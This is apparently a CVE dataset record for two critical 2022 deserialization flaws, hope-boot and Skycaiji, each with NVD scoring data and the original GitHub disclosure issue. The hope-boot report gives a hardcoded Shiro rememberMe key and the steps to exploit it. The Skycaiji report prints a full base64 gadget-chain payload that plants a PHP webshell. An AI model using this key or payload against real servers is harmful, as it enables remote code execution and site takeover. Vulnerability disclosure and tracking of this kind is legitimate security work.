https://github.com/shd101wyy/vscode-markdown-preview-enhanced/issues/640
1,460,527,817
640
4,484
CVE-2022-44371
2022-12-07T17:15:10.967
hope-boot 1.0.0 has a deserialization vulnerability that can cause Remote Code Execution (RCE).
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/java-aodeng/hope-boot/issues/83" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/java-aodeng/hope-boot/issues/83" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:hope-boot_project:hope-boot:1.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "83023A51-1288-480A-97A1-43CCFDCF1CCE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "502" ]
502
https://github.com/java-aodeng/hope-boot/issues/83
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "java-aodeng", "hope-boot" ]
The author has set a fixed key in the com.hope.shiro.config.ShiroConfig under the hope-admin package and uses this key to encrypt the rememberMe parameter in the cookie. This situation can lead to a deserialisation attack with very serious consequences. ![1](https://user-images.githubusercontent.com/75016675/198077595-5dc4a258-13b2-4cdc-9ff8-6ce55b8484f4.jpg) This key can also be obtained by decrypting the ciphertext corresponding to the rememberMe parameter. Set up a local environment for attacks. When the attacker logs in and selects remember me, the cookie will have the rememberMe field ![2](https://user-images.githubusercontent.com/75016675/198077645-7918c3fa-5067-4245-9fc1-f838b9efe135.jpg) After blasting or auditing the source code, we can find that the encoded key is 1QWLxg+NYmxraMoxAXu/Iw==, which is the same as the key set in the source code. After an audit, I found that the source code contains commons-beanutils-1.9.4.jar dependency, which is actually a dependency included in shiro. Using this dependency, it is possible to generate a deserialized payload and then encrypt the payload using the key obtained by blasting. Finally, write this payload after the rememberMe field and attack it. Successful RCE ![3](https://user-images.githubusercontent.com/75016675/198077678-2043dc5f-3c9c-40ea-a176-d54a181eff69.jpg) Note that the JSESSIONID in the cookie field should be deleted, otherwise the system will make judgments directly based on the JSESSIONID.
There is a deserialization vulnerability that can cause RCE
https://api.github.com/repos/java-aodeng/hope-boot/issues/83/comments
0
2022-10-26T16:06:26Z
2022-10-26T16:18:55Z
https://github.com/java-aodeng/hope-boot/issues/83
1,424,310,612
83
4,485
CVE-2022-44351
2022-12-07T19:15:09.853
Skycaiji v2.5.1 was discovered to contain a deserialization vulnerability via /SkycaijiApp/admin/controller/Mystore.php.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/zorlan/skycaiji/issues/46" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/zorlan/skycaiji/issues/46" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:skycaiji:skycaiji:2.5.1:*:*:*:*:*:*:*", "matchCriteriaId": "D42AD2A1-FD75-4B28-A11D-3635BB32D06D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "502" ]
502
https://github.com/zorlan/skycaiji/issues/46
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "zorlan", "skycaiji" ]
I found a deserialization vulnerability in v2.5.1 URL: http://localhost/index.php?s=/admin/mystore/upload <img width="1512" alt="" src="https://user-images.githubusercontent.com/72502573/197928307-eb1f204b-0551-4b40-83e1-b1d2465c068b.png"> unserialize's parameter can control by uploading the file contains the payload. `/*skycaiji-plugin-start*/TzoyNzoidGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzIjoxOntzOjM0OiIAdGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzAGZpbGVzIjthOjE6e2k6MDtPOjE3OiJ0aGlua1xtb2RlbFxQaXZvdCI6NDp7czo2OiJwYXJlbnQiO086MjA6InRoaW5rXGNvbnNvbGVcT3V0cHV0IjoyOntzOjI4OiIAdGhpbmtcY29uc29sZVxPdXRwdXQAaGFuZGxlIjtPOjMwOiJ0aGlua1xzZXNzaW9uXGRyaXZlclxNZW1jYWNoZWQiOjE6e3M6MTA6IgAqAGhhbmRsZXIiO086MjM6InRoaW5rXGNhY2hlXGRyaXZlclxGaWxlIjoyOntzOjEwOiIAKgBvcHRpb25zIjthOjU6e3M6NjoiZXhwaXJlIjtpOjM2MDA7czoxMjoiY2FjaGVfc3ViZGlyIjtiOjA7czo2OiJwcmVmaXgiO3M6MDoiIjtzOjQ6InBhdGgiO3M6NzQ6InBocDovL2ZpbHRlci93cml0ZT1zdHJpbmcucm90MTMvcmVzb3VyY2U9PD9jdWMgQHJpbnkoJF9UUkdbX10pOz8+Ly4uL2EucGhwIjtzOjEzOiJkYXRhX2NvbXByZXNzIjtiOjA7fXM6NjoiACoAdGFnIjtzOjM6InlsZyI7fX1zOjk6IgAqAHN0eWxlcyI7YToxOntpOjA7czo3OiJnZXRBdHRyIjt9fXM6OToiACoAYXBwZW5kIjthOjE6e2k6MDtzOjg6ImdldEVycm9yIjt9czo3OiIAKgBkYXRhIjthOjE6e2k6MDtzOjM6IjEyMyI7fXM6ODoiACoAZXJyb3IiO086Mjc6InRoaW5rXG1vZGVsXHJlbGF0aW9uXEhhc09uZSI6Mzp7czoxNToiACoAc2VsZlJlbGF0aW9uIjtpOjA7czo4OiIAKgBxdWVyeSI7TzoxNDoidGhpbmtcZGJcUXVlcnkiOjE6e3M6ODoiACoAbW9kZWwiO086MjA6InRoaW5rXGNvbnNvbGVcT3V0cHV0IjoyOntzOjI4OiIAdGhpbmtcY29uc29sZVxPdXRwdXQAaGFuZGxlIjtyOjU7czo5OiIAKgBzdHlsZXMiO2E6MTp7aTowO3M6NzoiZ2V0QXR0ciI7fX19czoxMToiACoAYmluZEF0dHIiO2E6MTp7aTowO3M6MzoiMTIzIjt9fX19fQ==/*skycaiji-plugin-end*/` We will get a webshell <img width="1512" alt="截屏2022-10-26 02 47 53" src="https://user-images.githubusercontent.com/72502573/197929867-d124a4cc-67fa-4791-8790-b33396c81a53.png">
Skycaiji has a deserialization vulnerability in v2.5.1
https://api.github.com/repos/zorlan/skycaiji/issues/46/comments
0
2022-10-26T03:45:52Z
2023-01-26T10:43:33Z
https://github.com/zorlan/skycaiji/issues/46
1,423,392,464
46
4,486